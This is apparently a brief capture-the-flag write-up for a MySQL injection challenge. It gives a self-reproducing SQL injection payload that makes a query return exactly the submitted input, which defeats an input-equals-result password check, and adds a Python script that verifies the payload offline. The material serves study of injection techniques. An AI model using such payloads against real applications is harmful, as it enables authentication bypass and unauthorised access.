Bypass: the value returned by the query must be identical to the value you submitted.

(https://blogbuyi.com/2021/10/10/2021-第五空间智能安全大赛-web-yet_another_mysql_injection/)

payload

1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#
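
As an added example (not part of the original write-up), the following Python models MySQL's REPLACE() and CHAR() with plain string operations and evaluates the payload's SELECT expression offline, showing that the value it returns is the payload itself. The function names are assumptions made for this illustration.

```python
# Added illustration: evaluates the payload's SELECT expression with plain
# string operations (no database) to show the result equals the input.

# The payload exactly as listed on this page.
PAGE_PAYLOAD = """1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#"""


def mysql_char(code):
    # CHAR(34) is '"', CHAR(39) is "'", CHAR(37) is '%'.
    return chr(code)


def mysql_replace(subject, search, replacement):
    # REPLACE() substitutes every occurrence in a single pass and does not
    # rescan the inserted text, which matches str.replace.
    return subject.replace(search, replacement)


def evaluate_select(payload):
    """Return (template, after_inner_replace, select_result) for this payload shape."""
    parts = payload.split("'")
    # Expected shape: prefix ' head 'template' middle 'template' tail
    if len(parts) != 6 or parts[2] != parts[4]:
        raise ValueError("payload lacks two identical quoted literals")
    template = parts[2]
    # Inner REPLACE: double quotes become single quotes.
    inner = mysql_replace(template, mysql_char(34), mysql_char(39))
    # Outer REPLACE: each % placeholder becomes the original template,
    # double quotes included, which rebuilds the quoted literals.
    result = mysql_replace(inner, mysql_char(37), template)
    return template, inner, result


def is_self_reproducing(payload):
    try:
        return evaluate_select(payload)[2] == payload
    except ValueError:
        return False


if __name__ == "__main__":
    template, inner, result = evaluate_select(PAGE_PAYLOAD)
    print("template :", template)
    print("inner    :", inner)
    print("matches input:", result == PAGE_PAYLOAD)
    # Constructed counter-case: only the leading character is changed.
    print("altered copy matches:", is_self_reproducing("2" + PAGE_PAYLOAD[1:]))
```
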